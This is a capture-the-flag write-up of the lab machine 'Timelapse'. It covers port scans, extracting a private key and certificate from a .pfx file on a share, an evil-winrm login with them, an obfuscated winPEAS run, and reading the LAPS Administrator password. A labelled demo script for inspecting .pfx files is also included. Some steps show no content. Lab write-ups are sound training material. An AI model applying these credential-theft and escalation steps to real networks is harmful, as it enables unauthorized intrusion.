TL;DR
- The shares reveal a .pfx file
- From the .pfx we get a certificate and a private key
- We use those files to access the machine
- We then use WinPEAS to find another set of credentials
- The new user has permissions to read the LAPS passwords
- We retrieve the Administrator password and log in with it
NETWORK
rustscan -a 10.10.11.152
Open 10.10.11.152:53
Open 10.10.11.152:88
Open 10.10.11.152:135
Open 10.10.11.152:139
Open 10.10.11.152:389
Open 10.10.11.152:445
Open 10.10.11.152:464
Open 10.10.11.152:593
Open 10.10.11.152:636
Open 10.10.11.152:3268
Open 10.10.11.152:3269
Open 10.10.11.152:5986
Open 10.10.11.152:9389
Open 10.10.11.152:49667
Open 10.10.11.152:49674
Open 10.10.11.152:49673
Open 10.10.11.152:49696
Open 10.10.11.152:54443
nmap -sCV 10.10.11.152 -Pn -p53,88,135,139,389,445,464,593,636,3268,3269,5986,9389,49667,49674,49673,49696,54443 -oN nmap_selected_ports
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-31 04:21 EDT
Nmap scan report for 10.10.11.152
Host is up (0.027s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-03-31 16:21:32Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn:
|_ http/1.1
|_ssl-date: 2022-03-31T16:23:01+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after: 2022-10-25T14:25:29
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49696/tcp open msrpc Microsoft Windows RPC
54443/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-03-31T16:22:24
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: mean: 8h00m00s, deviation: 0s, median: 7h59m59s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.20 seconds
ENUMERATION
Checking shares
FOOTHOLD
Files exploration
We have found a password
We have found another credential
Extract data out of pfx
A .PFX (Personal Information Exchange) file is a PKCS#12 container used to store a certificate together with its private and public keys. For example, if we need to transfer an SSL certificate from one Windows server to another, we can simply export it as a .pfx file using the IIS SSL export wizard or the MMC console.
Private Key
The following command extracts the embedded private key (the -nodes flag writes it out unencrypted):
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out priv-key.pem -nodes
Certificate
The following command extracts the certificate:
openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out certificate.pem
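As an added illustration of what a .pfx bundle contains (this script is not part of the original write-up), the following shell functions build a throwaway PKCS#12 file with openssl and then inspect it the way an audit of exported .pfx files found on a share would: whether the bundle carries a private key, which subject the certificate is issued to, and whether it is still valid. The file name, subject and password are constructed for the example.

```shell
#!/usr/bin/env sh
# Constructed demo: create a self-signed certificate and key, bundle them as
# a .pfx, then inspect the bundle with the same openssl pkcs12 tooling used
# in the write-up. Nothing here touches a real host or share.
set -eu

# Build a throwaway PKCS#12 bundle at $1 protected with password $2.
# Subject and password are constructed values for this example.
make_demo_pfx() {
  out=$1; pass=$2
  dir=$(mktemp -d)
  # Minimal req config so the run does not depend on a system openssl.cnf;
  # the subject comes from -subj, so the dn section can stay empty.
  printf '[req]\ndistinguished_name=dn\n[dn]\n' > "$dir/req.cnf"
  openssl req -config "$dir/req.cnf" -x509 -newkey rsa:2048 -nodes -days 365 \
    -subj "/CN=demo-dev-auth.example.test" \
    -keyout "$dir/key.pem" -out "$dir/cert.pem" >/dev/null 2>&1
  openssl pkcs12 -export -inkey "$dir/key.pem" -in "$dir/cert.pem" \
    -out "$out" -passout "pass:$pass"
  rm -rf "$dir"
}

# Print "yes" if the bundle at $1 (password $2) contains a private key.
# A bundle with a key is a credential, not just a public certificate.
pfx_has_private_key() {
  if openssl pkcs12 -in "$1" -nocerts -nodes -passin "pass:$2" 2>/dev/null \
       | grep -q 'PRIVATE KEY'; then echo yes; else echo no; fi
}

# Print the subject of the end-entity certificate in the bundle.
pfx_cert_subject() {
  openssl pkcs12 -in "$1" -nokeys -clcerts -passin "pass:$2" 2>/dev/null \
    | openssl x509 -noout -subject
}

# Print "valid" if the certificate has not passed its notAfter date,
# otherwise "expired" (-checkend 0 asks whether it expires within 0 seconds).
pfx_cert_status() {
  if openssl pkcs12 -in "$1" -nokeys -clcerts -passin "pass:$2" 2>/dev/null \
       | openssl x509 -noout -checkend 0 >/dev/null; then echo valid; else echo expired; fi
}
```

Run the three inspection functions against any .pfx and its password to see at a glance whether the file is a usable client credential and who it identifies.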
Using the following command, we gained access to the machine as the user legacyy:
/opt/evil-winrm/evil-winrm.rb -i 10.10.11.152 -S -k modified-priv-key.key -c certificate.pem
PRIV ESCALATION
Manual enumeration
We don't have much to work with in terms of permissions.
But the user svc_deploy has extra permissions related to the information we found in the shares.
From user legacyy to user svc_deploy
Using the obfuscated version of winPEAS (winPEASx64_ofs.exe),
we found the following:
Let's copy this file to our local machine.
We have found the svc_deploy credentials.
From user svc_deploy to Administrator
Abusing LAPS
Import-Module .\laps.ps1
Let's retrieve the LAPS password: